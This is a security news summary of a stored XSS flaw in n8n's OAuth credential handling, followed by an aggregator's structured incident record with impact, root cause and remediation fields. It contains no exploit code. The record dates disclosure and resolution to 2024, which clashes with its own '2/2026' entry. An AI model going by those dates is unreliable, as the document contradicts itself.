Stored XSS Vulnerability in n8n Automation Platform Exposes Credentials to Attackers
Researchers at Imperva have identified a stored cross-site scripting (XSS) vulnerability in n8n, a popular workflow automation platform, stemming from a misconfiguration in OAuth credential handling. The flaw, patched in n8n v2.6.4 released on February 6, could allow attackers to inject malicious JavaScript payloads into the platform’s database, compromising credentials and potentially gaining control of connected systems.
How the Vulnerability Works
n8n enables organizations to automate workflows by integrating with services like Google Workspace, Microsoft 365, Slack, and GitHub via OAuth tokens or API keys. However, the platform failed to properly sanitize authorization URLs, allowing attackers to replace legitimate URLs with malicious scripts. Once stored, these payloads execute when other users interact with the compromised credentials, leading to credential exfiltration and potential system-wide compromise.
Attack Requirements & Impact
Exploiting this flaw requires initial access to the victim’s n8n system, making it a second-stage attack rather than an entry point. However, if successful, an attacker could:
- Steal OAuth tokens and API keys across multiple services.
- Escalate access to connected applications, including CRMs, databases, and messaging tools.
- Compromise entire automation workflows, amplifying the breach’s impact.
Imperva warns that automation platforms like n8n centralize risk by aggregating access to critical systems. A single vulnerability in such a platform can be more damaging than a flaw in an isolated application, as it provides a gateway to multiple services.
Previous Incidents & Growing Threat
n8n has faced security challenges before, including a separate OAuth-related vulnerability patched in January alongside four other CVEs. The platform’s rising popularity has also attracted threat actors, with reports of malicious integrations posing as legitimate n8n tools.
Organizations using n8n are advised to treat automation platforms as Tier-0 assets, enforcing strict access controls and ensuring timely patching to mitigate risks. The latest fix (v2.6.4) addresses the stored XSS flaw, but users must apply updates to prevent exploitation.
n8n cybersecurity rating report: https://www.rankiteo.com/company/n8n
"id": "N8N1772821622",
"linkid": "n8n",
"type": "Vulnerability",
"date": "2/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': 'Organizations using n8n for '
'workflow automation',
'industry': 'Technology/Software Development',
'name': 'n8n',
'type': 'Software/Automation Platform'}],
'attack_vector': 'Malicious JavaScript payload injection via OAuth credential '
'handling misconfiguration',
'data_breach': {'data_exfiltration': 'Possible (credential theft via '
'malicious scripts)',
'personally_identifiable_information': 'Possible (if '
'connected services '
'store PII)',
'sensitivity_of_data': 'High (access to connected services)',
'type_of_data_compromised': 'OAuth tokens, API keys, '
'credentials'},
'date_publicly_disclosed': '2024-02-06',
'date_resolved': '2024-02-06',
'description': 'Researchers at Imperva identified a stored cross-site '
'scripting (XSS) vulnerability in n8n, a popular workflow '
'automation platform, stemming from a misconfiguration in '
'OAuth credential handling. The flaw could allow attackers to '
'inject malicious JavaScript payloads into the platform’s '
'database, compromising credentials and potentially gaining '
'control of connected systems.',
'impact': {'brand_reputation_impact': 'Potential reputational damage due to '
'credential compromise and system '
'access risks',
'data_compromised': 'OAuth tokens, API keys, credentials',
'identity_theft_risk': 'High (if PII or sensitive credentials are '
'exposed)',
'operational_impact': 'Compromise of automation workflows, '
'potential system-wide access escalation',
'systems_affected': 'n8n automation platform, connected services '
'(Google Workspace, Microsoft 365, Slack, '
'GitHub, etc.)'},
'investigation_status': 'Patched',
'lessons_learned': 'Automation platforms centralize risk and should be '
'treated as Tier-0 assets with strict access controls and '
'timely patching.',
'post_incident_analysis': {'corrective_actions': 'Patch released in n8n '
'v2.6.4 to sanitize '
'authorization URLs',
'root_causes': 'Improper sanitization of '
'authorization URLs in OAuth '
'credential handling'},
'recommendations': 'Apply n8n v2.6.4 patch, enforce strict access controls, '
'monitor for malicious integrations, and treat automation '
'platforms as critical assets.',
'references': [{'source': 'Imperva'}],
'response': {'containment_measures': 'Patch released in n8n v2.6.4',
'remediation_measures': 'Proper sanitization of authorization '
'URLs, patch application',
'third_party_assistance': 'Imperva (security research)'},
'stakeholder_advisories': 'Organizations using n8n advised to apply the patch '
'and enforce access controls.',
'title': 'Stored XSS Vulnerability in n8n Automation Platform Exposes '
'Credentials to Attackers',
'type': 'Stored Cross-Site Scripting (XSS)',
'vulnerability_exploited': 'Improper sanitization of authorization URLs in '
'n8n'}